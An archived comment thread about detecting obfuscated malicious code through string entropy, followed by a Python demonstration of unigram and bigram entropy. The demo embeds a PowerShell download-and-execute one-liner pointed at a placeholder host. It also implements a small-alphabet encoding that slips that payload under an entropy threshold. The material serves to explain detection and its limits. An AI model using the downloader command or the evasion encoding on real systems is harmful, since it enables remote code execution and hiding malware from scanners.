💾 Archived View for dioskouroi.xyz › thread › 29430823 captured on 2021-12-03 at 14:04:38. Gemini links have been rewritten to link to archived content

-=-=-=-=-=-=-

Using Entropy to Identify Obfuscated Malicious Code

Author: MiffedIt

Score: 12

Comments: 5

Date: 2021-12-03 15:06:51

________________________________________________________________________________

motohagiography wrote at 2021-12-03 18:16:18:

The table of typical entropy of those encodings is extra useful if you hack around with CyberChef. Embedded and nested zip files would be another common encoding mechanism used to bypass AV.

twox2 wrote at 2021-12-03 17:24:15:

"Large numbers of obfuscated strings are uncommon in benign software."

I think this is simply not true when it comes to the web.

staticassertion wrote at 2021-12-03 17:27:44:

So the next obfuscation technique would be to encode strings using a low entropy encoding, yeah?

ihm wrote at 2021-12-03 16:49:38:

What do they mean by entropy of a string? Entropy of the distribution of frequencies of characters? N-grams?

lwl wrote at 2021-12-03 17:14:12:

In this particular case, we're referencing Shannon Entropy. We've got a few other items that also look at bigrams on a per-language basis. As you can imagine, this changes depending on the language used for the given software package.
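Added example, not code from the article or from any commenter above: it makes concrete what ihm asked and lwl answered (Shannon entropy of the character-frequency distribution, and the bigram variant), and it shows staticassertion's point about low-entropy encodings. The payload string, the two-symbol encoding, the function names and the 4.0 threshold are all constructed for illustration; the article's own entropy table is not reproduced here.

```python
"""Shannon (unigram) and bigram entropy of strings, and why a per-character
entropy threshold is easy to slip under with a small-alphabet encoding.
Added illustration; the payload, encoding and threshold are constructed."""
import base64
import math
from collections import Counter


def _entropy(symbols) -> float:
    """Shannon entropy, in bits per symbol, of the empirical frequency
    distribution of an iterable of symbols."""
    counts = Counter(symbols)
    n = sum(counts.values())
    if n == 0:
        return 0.0
    return -sum((c / n) * math.log2(c / n) for c in counts.values())


def shannon_entropy(s: str) -> float:
    """Entropy over single characters: 0 for one repeated character,
    at most log2(len(s)) and at most log2(alphabet size)."""
    return _entropy(s)


def bigram_entropy(s: str) -> float:
    """Entropy over adjacent character pairs (one kind of N-gram)."""
    return _entropy(s[i:i + 2] for i in range(len(s) - 1))


def two_symbol_encode(data: bytes, zero: str = "a", one: str = "b") -> str:
    """Hypothetical evasion (constructed for this example): spell each bit
    as one of two characters, most significant bit first. Whatever the
    payload, unigram entropy of the result is <= 1 bit/char."""
    return "".join(one if (byte >> bit) & 1 else zero
                   for byte in data for bit in range(7, -1, -1))


def two_symbol_decode(text: str, one: str = "b") -> bytes:
    """Inverse of two_symbol_encode; len(text) must be a multiple of 8."""
    out = bytearray()
    for i in range(0, len(text), 8):
        value = 0
        for ch in text[i:i + 8]:
            value = (value << 1) | (1 if ch == one else 0)
        out.append(value)
    return bytes(out)


def flag_high_entropy(s: str, threshold: float, min_len: int = 16) -> bool:
    """Per-character entropy check. Strings shorter than min_len are skipped
    because entropy is capped at log2(len(s)) and can never reach a threshold
    tuned for longer strings. The threshold is a parameter because it has to
    be calibrated against benign strings of the language being scanned; the
    4.0 used below is illustrative, not a recommended value."""
    return len(s) >= min_len and shannon_entropy(s) > threshold


# Constructed sample payload (not from the article): a one-line downloader
# string of the kind an obfuscator would hide. example.invalid is a reserved
# name that never resolves.
PAYLOAD = (b"powershell -nop -w hidden -c \"IEX (New-Object Net.WebClient)"
           b".DownloadString('http://example.invalid/a')\"")
BASE64_SAMPLE = base64.b64encode(PAYLOAD).decode()   # alphabet of 64, H1 well above 4
HEX_SAMPLE = PAYLOAD.hex()                            # alphabet of 16, H1 capped at 4.0
TWO_SYMBOL_SAMPLE = two_symbol_encode(PAYLOAD)        # alphabet of 2, H1 capped at 1.0

if __name__ == "__main__":
    threshold = 4.0  # illustrative only
    for name, s in [("base64", BASE64_SAMPLE), ("hex", HEX_SAMPLE),
                    ("two-symbol", TWO_SYMBOL_SAMPLE)]:
        print(f"{name:10s} len={len(s):4d} H1={shannon_entropy(s):.2f} "
              f"H2={bigram_entropy(s):.2f} flagged={flag_high_entropy(s, threshold)}")
    assert two_symbol_decode(TWO_SYMBOL_SAMPLE) == PAYLOAD
```

Running the demo shows the same payload scoring above the threshold as base64, at or below it as hex, and far below it in the two-symbol form, while decoding back to identical bytes in every case. Whatever threshold is chosen, an encoding whose alphabet has at most 2^threshold symbols cannot trip a unigram check, which is why a per-language baseline and bigram (or longer N-gram) statistics, as lwl mentions, are needed alongside the single-character measure.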